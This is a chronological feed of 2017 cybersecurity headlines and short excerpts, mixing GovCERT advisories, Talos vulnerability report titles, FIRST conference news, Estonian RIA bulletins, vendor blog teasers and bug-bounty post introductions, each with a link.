Security Alert (A17-07-02): Vulnerability in Apache Struts
2017-07-10T04:00:00Z | 1499659200

A vulnerability is relevant if the Apache Struts system adopts the "Struts 2 Struts 1 plugin".

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-07-01): Multiple Vulnerabilities in Cisco Products
2017-07-07T04:00:00Z | 1499400000

Cisco has released a security advisory to address the vulnerabilities of Simple Network Management Protocol (SNMP) in Cisco IOS and IOS XE software.

https://www.govcert.gov.hk/en/alerts_detail.php
Poppler PDF library JPEG 2000 levels Code Execution Vulnerability
2017-07-07T00:00:00Z | 1499385600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0321
Poppler PDF Image Display DCTStream::readProgressiveSOF() Code Execution Vulnerability
2017-07-07T00:00:00Z | 1499385600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0319
Poppler PDF Image Display DCTStream::readScan() Code Execution Vulnerability
2017-07-07T00:00:00Z | 1499385600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0311
FIRST announces release of Guidelines and Practices for Multi-Party Vulnerability Coordination and Disclosure
2017-07-06T13:00:00Z | 1499346000

The Forum of Incident Response and Security Teams announces the release of a set of guidelines and norms for vulnerability disclosure that affects multiple parties.

https://www.first.org/newsroom/releases/20170706
Nitro Pro 11 PDF Handling Code Execution Vulnerability
2017-07-06T00:00:00Z | 1499299200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0289
FWaaS or Managed Firewall Services: What’s the Difference?
2017-07-02T13:40:34Z | 1499002834

There’s been a lot of hype around Firewall as a Service (FWaaS). At first glance, the hype seems misplaced. After all, managed firewall services are certainly not new. But FWaaS is fundamentally different from a managed firewall service. Understanding those differences has significant implications for security and networking teams. We’ll analyze those issues in our... The post FWaaS or Managed Firewall Services: What’s the Difference? appeared first on Cato Networks.

https://www.catonetworks.com/blog/fwaas-or-managed-firewall-services-whats-the-difference/
Security Alert (A17-06-07): Multiple Vulnerabilities in ISC BIND
2017-06-30T04:00:00Z | 1498795200

Multiple vulnerabilities were found in the ISC BIND software. A remote attacker that can send and receive messages to an authoritative DNS server and with knowledge of a valid Transaction Signature (TSIG) key name could send specially crafted packets to read or manipulate zone contents.

https://www.govcert.gov.hk/en/alerts_detail.php
Dell Precision Optimizer Local Privilege Escalation Vulnerability
2017-06-30T00:00:00Z | 1498780800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0247
Invincea Dell Protected Workspace Protection Bypass
2017-06-30T00:00:00Z | 1498780800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0246
Invincea-X SboxDrv.sys Version Number Query Local Privilege Escalation Vulnerability
2017-06-30T00:00:00Z | 1498780800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0256
WannaCry II: How to Stop NotPetya Infections with the Cato Cloud
2017-06-29T13:39:38Z | 1498743578

Just a little more than a month after WannaCry delivered the “largest” ransomware attack in history, the industry was reeling from it’s sequel, NotPetya. Like WannaCry, NotPetya leverages the SMB protocol to move laterally across the network, an EternalBlue exploit attributed to the National Security Agency (NSA) and leaked by the Shadow Brokers hacking group... The post WannaCry II: How to Stop NotPetya Infections with the Cato Cloud appeared first on Cato Networks.

https://www.catonetworks.com/blog/wannacry-ii-how-to-stop-notpetya-infections-with-the-cato-cloud/
Security Alert (A17-06-06): Defences against the "Petrwrap" Ransomware Attack
2017-06-28T04:00:00Z | 1498622400

The recent worldwide ransomware attack named as "Petrwrap" is spreading wildly in Europe and has already affected many organisations including governments and public utilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Pahavaraga on pihta saanud kaks Eestis asuvat ettevõtet
2017-06-27T21:00:00Z | 1498597200

Riigi Infosüsteemi Ameti andmetel on Eestis asuvatest ettevõtetest saanud pahavaraga pihta kaks Saint-Gobaini kontserni kuuluvat ettevõtet. Üks nendest on Ehituse ABC.

https://ria.ee/uudised/pahavaraga-pihta-saanud-kaks-eestis-asuvat-ettevotet
ID-kaardi tarkvara uuendus toob kaasa mitu olulist muudatust
2017-06-26T21:00:00Z | 1498510800

Peamise uuendusena kaasneb rakendus, mis võimaldab võltsimiste ennetamiseks üle tembeldada kõik DDOC formaadis digitaalselt allkirjastatud dokumendid.

https://ria.ee/uudised/id-kaardi-tarkvara-uuendus-toob-kaasa-mitu-olulist-muudatust
CERT-EE hoiatab: Uus lunavaraga nakatumise laine
2017-06-26T21:00:00Z | 1498510800

Täna hommikul tabas maailma uus lunavaralaine, nakatunud on mitmete suurettevõtete süsteemid. Praeguseks on teada, et pahavara levib ülikiiresti ning taaskord on sihikule võetud Windowsi süsteemid. Praeguseks on kinnitatud nakatumised toimunud kaheksas riigis, Eestis teadaolevalt ühtegi nakatumist senini toimunud pole.

https://ria.ee/uudised/cert-ee-hoiatab-uus-lunavaraga-nakatumise-laine
The Internet is Broken: Here’s Why
2017-06-26T08:14:23Z | 1498464863

It’s become the favorite whipping boy of networking. The Internet is erratic. The Internet is unstable. The Internet is unsecure. But exactly what is wrong with the Internet and can it be fixed? We dove into that question with our co-founder and CTO Gur Shatz in a recent eBook, “The Internet is Broken: Why Public... The post The Internet is Broken: Here’s Why appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-internet-is-broken-heres-why/
Permanent account takeover on Yahoo's Small Business platform
2017-06-25T00:00:00Z | 1498348800

If you decided to go out and spontaneously develop a content management system one of the most crucial and necessary setups would be the authentication of user accounts. This function is generally accomplished through designation of a username and password (normally created by the user), but can get messy when you have to deal with real world scenarios.

https://samcurry.net/permanent-account-takeover-on-yahoo-small-business
Security Alert (A17-06-05): Multiple Vulnerabilities in Linux/Unix Operating Systems
2017-06-23T04:00:00Z | 1498190400

Multiple vulnerabilities were found in the memory management of the affected operating systems. These vulnerabilities can lead to privilege escalation on these systems by corrupting memory and executing arbitrary code.

https://www.govcert.gov.hk/en/alerts_detail.php
InsideSecure MatrixSSL x509 certificate General Names Information Disclosure Vulnerability
2017-06-22T00:00:00Z | 1498089600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0278
InsideSecure MatrixSSL x509 certificate IssuerDomainPolicy Remote Code Execution Vulnerability
2017-06-22T00:00:00Z | 1498089600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0277
InsideSecure MatrixSSL x509 certificate SubjectDomainPolicy Remote Code Execution Vulnerability
2017-06-22T00:00:00Z | 1498089600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0276
How to Build Virtual Python Environment
2017-06-21T04:00:00Z | 1498017600

In the DevOps world, getting a consistent development environment is crucial. In this post, I'll show you how to set up a virtual Python environment and install the correct libraries to achieve a consistent development environment.

https://www.akamai.com/blog/developers/how-building-virtual-python-environment
Riigiportaal eesti.ee sai uue ilme
2017-06-19T21:00:00Z | 1497906000

Sellest nädalast on riigiportaalil uus ja kaasaegne nägu, mida on mugav jälgida ka kõikidest nutiseadmetest.

https://ria.ee/uudised/riigiportaal-eestiee-sai-uue-ilme
Firewall as a Service Comes of Age
2017-06-19T14:34:50Z | 1497882890

In a 2016 Hype Cycle for Infrastructure Protection report, Gartner Analyst Jeremy D’Hoinne initiated the emerging category of Firewall as a Service (FWaaS). FWaaS is a cloud-based architecture that eliminates the need to deploy firewalls on-premises, mainly in remote branches, in order to provide site-to-site connectivity and secure Internet access. Cato Networks is a pioneer... The post Firewall as a Service Comes of Age appeared first on Cato Networks.

https://www.catonetworks.com/blog/firewall-as-a-service-comes-of-age/
Foscam IP Video Camera CGIProxy.fcgi SMTP Test Password Parameter Configuration Command Injection Vulnerability
2017-06-19T00:00:00Z | 1497830400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0345
Foscam IP Video Camera CGIProxy.fcgi Wifi Settings Code Execution Vulnerability
2017-06-19T00:00:00Z | 1497830400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0353
Foscam IP Video Camera CGIProxy.fcgi Message 0x3001 Directory Traversal Vulnerability
2017-06-19T00:00:00Z | 1497830400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0330
Foscam IP Video Camera CGIProxy.fcgi NTP Server Configuration Command Injection Vulnerability
2017-06-19T00:00:00Z | 1497830400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0351
Foscam IP Video Camera CGIProxy.fcgi Query Append Buffer Overflow Vulnerability
2017-06-19T00:00:00Z | 1497830400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0332
Foscam IP Video Camera CGIProxy.fcgi Change Username pureftpd.passwd Injection Vulnerability
2017-06-19T00:00:00Z | 1497830400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0352
Foscam IP Video Camera CGIProxy.fcgi SMTP Test Host Parameter Configuration Command Injection Vulnerability
2017-06-19T00:00:00Z | 1497830400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0343
Foscam IP Video Camera CGIProxy.fcgi Gateway Address Configuration Command Injection Vulnerability
2017-06-19T00:00:00Z | 1497830400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0348
Foscam IP Video Camera CGIProxy.fcgi SMTP Test User Parameter Configuration Command Injection Vulnerability
2017-06-19T00:00:00Z | 1497830400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0344
Foscam IP Video Camera CGIProxy.fcgi Account Password Command Injection Vulnerability
2017-06-19T00:00:00Z | 1497830400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0329
Foscam IP Video Camera CGIProxy.fcgi SMTP Test Command Injection Vulnerability
2017-06-19T00:00:00Z | 1497830400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0347
Foscam IP Video Camera CGIProxy.fcgi FTP Startup Configuration Command Injection Vulnerability
2017-06-19T00:00:00Z | 1497830400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0334
Foscam IP Video Camera CGIProxy.fcgi SMTP Test Sender Parameter Configuration Command Injection Vulnerability
2017-06-19T00:00:00Z | 1497830400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0346
Foscam IP Video Camera CGIProxy.fcgi Account Creation Command Injection Vulnerability
2017-06-19T00:00:00Z | 1497830400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0328
Foscam IP Video Camera CGIProxy.fcgi Message 0x3001 Multi-part Form Boundary Code Execution Vulnerability
2017-06-19T00:00:00Z | 1497830400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0331
Foscam IP Video Camera CGIProxy.fcgi Account Deletion Command Injection Vulnerability
2017-06-19T00:00:00Z | 1497830400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0335
Foscam IP Video Camera WebService CGI Parameter Code Execution Vulnerability
2017-06-19T00:00:00Z | 1497830400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0299
Foscam C1 Webcam FTP Hard Coded Password Vulnerability
2017-06-19T00:00:00Z | 1497830400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0245
Foscam IP Video Camera CGIProxy.fcgi DNS2 Address Configuration Command Injection Vulnerability
2017-06-19T00:00:00Z | 1497830400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0350
Foscam IP Video Camera CGIProxy.fcgi DNS1 Address Configuration Command Injection Vulnerability
2017-06-19T00:00:00Z | 1497830400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0349
Keynote by Brian LaMacchia: “Post-Quantum Cryptography”
2017-06-17T10:00:00Z | 1497693600

The FIRST Conference’s Keynote sessions concluded today with a presentation by Brian LaMacchia, Director of the Security & Cryptography group within Microsoft Research (MSR). In this department, his team conducts basic and applied research and advanced development.

https://www.first.org/blog/20170616-Brian_LaMacchia
Security Alert (A17-06-04): Multiple Vulnerabilities in ISC BIND
2017-06-16T04:00:00Z | 1497585600

Multiple vulnerabilities were found in the ISC BIND software.

https://www.govcert.gov.hk/en/alerts_detail.php
Keynote by Martijn de Hamer: “18 years old, it’s time to become mature”
2017-06-16T01:00:00Z | 1497574800

Day four of the FIRST Conference began with a keynote presentation by Martijn de Hamer, the head of the National Cyber Security Operations Center (NCSOC) at the National Cyber Security Center (NCSC-NL) in the Netherlands. After having had various roles in the field of information security, de Hamer first started working for NCSC-NL (previously GOVCERT.NL) in 2005. Additionally, he is active in the field of CSIRT maturity and other aspects of CSIRT capacity building.

https://www.first.org/blog/20170615-Martijn_de_Hamer_keynote
Keynote by Florian Egloff: “Cybersecurity and the Age of Privateering”
2017-06-15T23:55:00Z | 1497570900

Day 3 of the FIRST Conference got started with keynote speaker Florian Egloff. Florian Egloff is a Clarendon Scholar, a D. Phil (PhD) Candidate in Cyber Security at the Centre for Doctoral Training in Cyber Security at the University of Oxford, and a Research Affiliate at the Cyber Studies Programme at Oxford University's Department of Politics and International Relations. He is currently working on his thesis entitled "Cybersecurity and non-state actors: a historical analogy with mercantile companies, privateers, and pirates."

https://www.first.org/blog/20170614-Florian_Egloff_keynote
Eesti ja Soome asutasid mittetulundusühingu X-tee arendamiseks
2017-06-15T21:00:00Z | 1497560400

Ettevõtlus- ja infotehnoloogiaminister Urve Palo ning Soome Rahandusministeeriumi asekantsler Anna-Maija Karjalainen allkirjastasid lepingu mittetulundusühingu asutamiseks, mille abil muudetakse kahe riigi vaheline andmevahetus oluliselt efektiivsemaks. Asutatud MTÜ nimeks on Nordic Institute for Interoperability Solutions (NIIS) ehk Põhjamaade Koosvõimelahenduste Instituut ning see hakkab paiknema Tallinnas.

https://ria.ee/uudised/eesti-ja-soome-asutasid-mittetulundusuhingu-x-tee-arendamiseks
FIRST strengthens global ties by partnering with regional security organizations
2017-06-15T20:00:00Z | 1497556800

The Forum of Incident Response and Security Teams signs Memorandums of Understanding with GÉANT and OIC-CERT to enhance collaboration.

https://www.first.org/newsroom/releases/20170615
FIRST Releases Framework for Product Security Incident Response Teams
2017-06-14T13:00:00Z | 1497445200

The leading association of incident response and security teams released a draft of the Product Security Incident Response Teams (PSIRT) Services Framework for public input. This is a formal list of services a PSIRT may consider implementing to address the needs of their constituency. Public input is welcomed until August 31, 2017 via psirt-comments@first.org.

https://www.first.org/newsroom/releases/20170614
Security Alert (A17-06-01): Multiple Vulnerabilities in Microsoft Products (June 2017)
2017-06-14T04:00:00Z | 1497412800

Microsoft has released 79 security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-06-02): Multiple Vulnerabilities in Adobe Flash Player
2017-06-14T04:00:00Z | 1497412800

Security updates are released for Adobe Flash Player to address multiple vulnerabilities caused by memory corruption and use-after-free error.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-06-03): Multiple Vulnerabilities in Firefox
2017-06-14T04:00:00Z | 1497412800

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox. These vulnerabilities are caused by memory safety bugs, library flaw, out-of-bounds read and use-after-free error, etc.

https://www.govcert.gov.hk/en/alerts_detail.php
Keynote by Darren Bilby: “A Decade of Lessons in Incident Response”
2017-06-13T23:00:00Z | 1497394800

Day 2 of the FIRST Conference got started with keynote speaker Darren Bilby, a manager in Google’s Enterprise Infrastructure protection team, who is also a staff security engineer and self-described digital janitor. A 10-year veteran at Google, Bilby was the tech lead for Google’s Global Incident Response Team for six years, managed Google's European detection team in Zürich for two years and has also worked as a software engineer building out Google’s security tools. He was also the founder and a core developer of the open source GRR Incident Response project.

https://www.first.org/blog/20170613-DarrenBilby_keynote
Opening keynote by Alex Stamos at the 29th Annual FIRST Conference in San Juan, Puerto Rico
2017-06-13T15:00:00Z | 1497366000

FIRST's Annual Conference kicked off on Monday morning, June 12th of 2017 with its opening keynote speaker, Facebook Chief Security Officer (CSO) Alex Stamos. As security lead for one of the world’s most noted companies, Stamos began his lecture with some of the biggest security challenges Facebook deals with.

https://www.first.org/blog/20170613-Opening-Keynote-San-Juan
Opening Offices in China and Asia Pacific: Are You Ready to Be a Hero?
2017-06-13T10:34:10Z | 1497350050

When street crime gets just a bit too much to handle in the Marvel Universe, the Defenders get the call. But when space aliens threaten global domination, the big guns are called in and it’s the Avengers that get to work.   Opening offices in the Asia Pac are a lot like that. New office... The post Opening Offices in China and Asia Pacific: Are You Ready to Be a Hero? appeared first on Cato Networks.

https://www.catonetworks.com/blog/opening-offices-in-china-and-asia-pacific-are-you-ready-to-be-a-hero/
Tablib Yaml Load Code Execution Vulnerability
2017-06-13T00:00:00Z | 1497312000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0307
FIRST Kicks off its 29th Annual Conference
2017-06-12T22:00:00Z | 1497304800

The event offers conferences, keynote presentations and activities designed to maximize network opportunities and information exchanges on information security and incident response.

https://www.first.org/newsroom/releases/20170612
FIRST calls for input on policy for standards development
2017-06-08T09:00:00Z | 1496912400

The Forum of Incident Response and Security Teams announces a public request for comments on a draft policy to guide cyber security standardization within its working groups.

https://www.first.org/newsroom/releases/20170608
FIRST boosts learning and development offering with launch of open training platform
2017-06-07T09:00:00Z | 1496826000

The Forum of Incident Response and Security Teams has announced the release of an open training platform for cyber security incident response professionals.

https://www.first.org/newsroom/releases/20170607
Come Meet the Cool Vendor at InfoSecurity Europe
2017-06-06T11:14:11Z | 1496747651

Gartner named Cato Networks as a “Cool Vendor” in its report “Cool Vendors in Security for Midsize Enterprises, 2017.”   The cool vendors highlighted in this report are those young vendors that offer a “disruptive combination of innovation and midsize enterprise suitability” for security in midsize enterprises. “Emerging vendors are disrupting security markets and successfully... The post Come Meet the Cool Vendor at InfoSecurity Europe appeared first on Cato Networks.

https://www.catonetworks.com/blog/come-meet-the-cool-vendor-at-infosec/
Rise of the UberNet
2017-06-05T06:56:42Z | 1496645802

Achilles had his heel and Superman has his kryptonite. For SD-WANs, the Internet has been their weakness. The lack of a global, SLA-backed backbone leaves SD-WANs unable to provide the consistent, predictable transport needed by real-time service and business-critical applications. As a result, SD-WAN adopters have remained chained to their MPLS services, paying exorbitant bandwidth... The post Rise of the UberNet appeared first on Cato Networks.

https://www.catonetworks.com/blog/rise-of-the-ubernet/
ID-kaardi sertifikaadid vajavad juuliks uuendamist
2017-06-04T21:00:00Z | 1496610000

1. juuliks tuleb uuendada enne 2014. aasta oktoobri keskpaika välja antud ID-kaartide sertifikaadid.

https://ria.ee/uudised/id-kaardi-sertifikaadid-vajavad-juuliks-uuendamist
Improving Cybersecurity With Adversarial Thinking
2017-06-04T10:10:10Z | 1496571010

People often ask me about ‘adversarial thinking’ — that somewhat amorphous concept that defines security folk with the uncanny ability to mentally model how things can break. Here’s how you approach it.

https://www.smokescreen.io/adversarial-thinking-improving-cybersecurity-with-ants-and-barcodes/
How I could've taken over the production server of a Yahoo acquisition through command injection
2017-06-04T00:00:00Z | 1496534400

On the night of May 20th I had begun to develop a small headache and neck pains after spending days looking at Yahoo's messenger application. I couldn't get a grasp of how it operated, so I stepped outside and made the decision to find a new target.

https://samcurry.net/how-i-couldve-taken-over-the-production-server-of-a-yahoo-acquisition-through-command-injection
FIRST to hold its 29th Conference in Puerto Rico
2017-05-31T23:00:00Z | 1496271600

This will mark the first time that the information safety organization brings the conference to the island and the Caribbean region.

https://www.first.org/newsroom/releases/20170531
WAN Survey: Be Wary of SD-WAN Complexity
2017-05-31T14:13:00Z | 1496239980

We recently surveyed 350 IT professionals to learn about how their WAN requirements are evolving with the emergence of SD-WANs. Our thesis was as businesses embrace clouds and hybrid clouds, a new set of WAN requirements being to emerge. Accessing the cloud and the Internet from remote locations becomes more important. There’s also a greater... The post WAN Survey: Be Wary of SD-WAN Complexity appeared first on Cato Networks.

https://www.catonetworks.com/blog/wan-survey-be-wary-of-sd-wan-complexity/
Security Alert (A17-05-07): Vulnerability in Synology DiskStation Manager (DSM) for Network Attached Storage (NAS) servers
2017-05-29T04:00:00Z | 1496030400

A vulnerability is found in the Synology DSM for NAS servers. A remote authenticated attacker could exploit the vulnerability by uploading a shared library to a writable shared folder for remote execution.

https://www.govcert.gov.hk/en/alerts_detail.php
InfoSecurity Europe: How to Build a Hybrid Cloud
2017-05-28T07:02:58Z | 1495954978

Considering or struggling with building a hybrid cloud? We might have the answer. At the upcoming InfoSecurity show in London, our co-founder and CTO, Gur Shatz, will provide practical tips on how to build and secure hybrid clouds at his session “Hybrid Cloud Secure Network Integration: Tips and Techniques.” The hybrid cloud lets IT professionals... The post InfoSecurity Europe: How to Build a Hybrid Cloud appeared first on Cato Networks.

https://www.catonetworks.com/blog/infosecurity-europe-how-to-build-a-hybrid-cloud/
Security Alert (A17-05-06): Multiple Vulnerabilities in IBM Notes and Domino
2017-05-24T04:00:00Z | 1495598400

Multiple vulnerabilities are found in IBM Notes and Domino. The bundled Java virtual machine (JVM) is susceptible to different attacks as listed in the Oracle Critical Patch Update Advisories (Jan 2017) which could be remotely exploited without authentication.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-05-05): Multiple Vulnerabilities in Apple iOS
2017-05-18T04:00:00Z | 1495080000

Apple has released software update fixing 41 vulnerabilities in iOS versions prior to iOS 10.3.2. These vulnerabilities are caused by the problems in various iOS components.

https://www.govcert.gov.hk/en/alerts_detail.php
RIA testib riigitöötajate küberteadlikkust
2017-05-16T21:00:00Z | 1494968400

Sel nädalal annab Riigi Infosüsteemi Amet riigiasutustele üle digitaalse õppekeskkonna, mis testib ja parandab riigitöötajate teadmisi virtuaalmaailmas.

https://ria.ee/uudised/ria-testib-riigitootajate-kuberteadlikkust
HackerNews Finds Cato Cloud to be a “Huge Benefit” for IT Professionals
2017-05-16T10:54:10Z | 1494932050

IT professionals have better things to do than worry about configuring granular firewall rules or racing to patch systems before they fall victim to the new WannaCrypt breakout. Getting to more strategic projects is often impossible, though, with those day-to-day emergencies. We’ve been saying that by converging networking and security into the cloud, Cato eliminates... The post HackerNews Finds Cato Cloud to be a “Huge Benefit” for IT Professionals appeared first on Cato Networks.

https://www.catonetworks.com/blog/hackernews-finds-cato-cloud-to-be-a-huge-benefit-for-it-professionals/
Magic with Manticore
2017-05-15T11:50:05Z | 1494849005

Manticore is a next-generation binary analysis tool with a simple yet powerful API for symbolic execution, taint analysis, and instrumentation. Using Manticore one can identify ‘interesting’ code locations and deduce inputs that reach them. This can generate inputs for improved test coverage, or quickly lead execution to a vulnerability. I used Manticore’s power to solve Magic, a challenge […]

https://blog.trailofbits.com/2017/05/15/magic-with-manticore/
How to Stop WannaCrypt Infections with the Cato Cloud
2017-05-15T07:53:29Z | 1494834809

What’s being called the “largest” ransomware attack in history and an “audacious global blackmail attempt,” WannaCrypt broke out Friday evening. In a matter of hours, the ransomware has swept across 45,000 computers in 74 countries. Like many ransomware attacks, WannaCrypt leverage phishing as an attack vector. But what makes the attack so unusually virulent is... The post How to Stop WannaCrypt Infections with the Cato Cloud appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-stop-wannacrypt-infections-with-the-cato-cloud/
MuPDF Fitz library font glyph scaling Code Execution Vulnerability
2017-05-15T00:00:00Z | 1494806400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0242
Artifex MuPDf JBIG2 Parser Code Execution Vulnerability
2017-05-15T00:00:00Z | 1494806400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0243
Kuidas kaitsta ennast lunavarakampaania eest?
2017-05-14T21:00:00Z | 1494795600

Eelmisel nädalal tabas Euroopat ulatuslik lunavarakampaania, mis häiris oluliselt näiteks Inglismaa haiglate, Hispaania sideetevõtete ja Saksamaa rongiliikluse infotabloode tööd ning mille jätkudes võib tekkida reaalne oht inimeste elule ja tervisele. Meile teadaolevalt ei saanud kannatada ükski eesti ettevõte ega astutus, kuid teadaolevalt oli neid sihtmärkide seas.

https://ria.ee/uudised/kuidas-kaitsta-ennast-lunavarakampaania-eest
Security Alert (A17-05-04) : Defences against the “WannaCry” Ransomware Attack
2017-05-14T04:00:00Z | 1494734400

Further to our previous Security Alert (A17-03-03), your urgent step-up actions are called for to ward off the “WannaCry” ransomware attacks and ensure that your computer would not be affected by the attacks.

https://www.govcert.gov.hk/en/alerts_detail.php
Hancom Thinkfree NEO Hangul Word Processor HWPTAG_TAB_DEF Tab Count Code Execution Vulnerability
2017-05-12T00:00:00Z | 1494547200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0320
The Bondnet Army: Questions & Answers
2017-05-11T13:00:00Z | 1494507600

The following is a select list of questions and answers that we hope will shed more light on the botnet.

https://www.akamai.com/blog/security/bondnet-army-qnda
Security Alert (A17-05-02): Multiple Vulnerabilities in Microsoft Products (May 2017)
2017-05-10T04:00:00Z | 1494388800

Microsoft has released 57 security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-05-03): Multiple Vulnerabilities in Adobe Flash Player
2017-05-10T04:00:00Z | 1494388800

Security updates are released for Adobe Flash Player to address multiple vulnerabilities caused by memory corruption and use-after-free error.

https://www.govcert.gov.hk/en/alerts_detail.php
Eradicating image authentication injection from the entire internet
2017-05-10T00:00:00Z | 1494374400

Thinking back to old forum days I can specifically remember an event where attackers modified their avatars to be invalid pages that responded with "HTTP 401 Unauthorized". This didn't really seem like an issue because there was interaction required by the users and the community was smart enough to simply close the prompt. After a long night of trying to escape the the "src" parameter of an image to achieve XSS I had an epiphany: why not try recreating the scenario presented years ago?

https://samcurry.net/eradicating-image-authentication-injection-from-the-entire-internet
How I stole the identity of every Yahoo user
2017-05-09T00:00:00Z | 1494288000

When looking at bug bounty programs that have existed for a long time it’s often beneficial to assume that every public facing page has already been automatedly scanned to death. In many cases this isn’t valid because of the types of tools people use, different scopes people prefer, or the tendency for these scanners to break or return false positives but approaching something with a realistic mindset can be fruitful.

https://samcurry.net/how-i-stole-the-identity-of-every-yahoo-user
PowerIso Parsing Code Execution Vulnerability
2017-05-05T00:00:00Z | 1493942400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0318
PowerISO ISO Parsing Use After Free
2017-05-05T00:00:00Z | 1493942400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0324
Security Alert (A17-05-01): Vulnerability in Intel Products
2017-05-04T04:00:00Z | 1493870400

Intel has issued a security advisory to address a privilege escalation vulnerability in Intel manageability products including Intel Active Management Technology (AMT), Intel Small Business Technology (SBT), and Intel Standard Manageability (ISM).

https://www.govcert.gov.hk/en/alerts_detail.php
AntennaHouse DMC HTMLFilter FillRowFormat Code Execution Vulnerability
2017-05-04T00:00:00Z | 1493856000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0279
AntennaHouse DMC HTMLFilter Txo Code Execution Vulnerability
2017-05-04T00:00:00Z | 1493856000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0288
AntennaHouse DMC HTMLFilter GetIndexArray Code Execution Vulnerability
2017-05-04T00:00:00Z | 1493856000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0291
AntennaHouse DMC HTMLFilter PPT DHFSummary Code Execution Vulnerability
2017-05-04T00:00:00Z | 1493856000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0286
AntennaHouse DMC HTMLFilter DHFSummary Code Execution Vulnerability
2017-05-04T00:00:00Z | 1493856000

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0209
AntennaHouse DMC HTMLFilter iBldDirInfo Code Execution Vulnerability
2017-05-04T00:00:00Z | 1493856000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0284
AntennaHouse DMC HTMLFilter Doc_GetFontTable Code Execution Vulnerability
2017-05-04T00:00:00Z | 1493856000

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0208
AntennaHouse DMC HTMLFilter UnCompressUnicode Code Execution Vulnerability
2017-05-04T00:00:00Z | 1493856000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0285
WolfSSL library X509 Certificate Text Parsing Code Execution Vulnerability
2017-05-04T00:00:00Z | 1493856000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0293
AntennaHouse DMC HTMLFilter AddSst Code Execution Vulnerability
2017-05-04T00:00:00Z | 1493856000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0292
AntennaHouse DMC HTMLFilter PPT ParseEnvironment Code Execution Vulnerability
2017-05-04T00:00:00Z | 1493856000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0290
AntennaHouse DMC HTMLFilter Doc_SetSummary Code Execution Vulnerability
2017-05-04T00:00:00Z | 1493856000

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0207
Randombit Botan Library X509 Certificate Validation Bypass Vulnerability
2017-04-28T00:00:00Z | 1493337600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0294
Manticore: Symbolic execution for humans
2017-04-27T04:00:00Z | 1493265600

Manticore helps us quickly take advantage of symbolic execution, taint analysis, and instrumentation to analyze binaries.

https://blog.trailofbits.com/2017/04/27/manticore-symbolic-execution-for-humans/
Zabbix Server Active Proxy Trapper Remote Code Execution Vulnerability
2017-04-27T00:00:00Z | 1493251200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0325
Zabbix Proxy Server SQL Database Write Vulnerability
2017-04-27T00:00:00Z | 1493251200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0326
IrfanView JPEG 2000 Reference Tile Width Arbitrary Code Execution Vulnerability
2017-04-26T00:00:00Z | 1493164800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0310
CERT-EE juht: Eesti võimekus küberkriise hallata on 10 aastaga oluliselt paranenud
2017-04-25T21:00:00Z | 1493154000

Täna toimub konverents „Küberturvalisuse olevik ja tulevik“, mis on pühendatud Eestit aastal 2007 tabanud küberründe aastapäevale. Konverentsil meenutatakse tollaseid tegevusi ning arutatakse Eesti küberturvalisuse hetkeolukorda ning väljakutseid.

https://ria.ee/uudised/cert-ee-juht-eesti-voimekus-kuberkriise-hallata-10-aastaga-oluliselt-paranenud
Service Insertion and Service Chaining Defined
2017-04-25T13:53:23Z | 1493128403

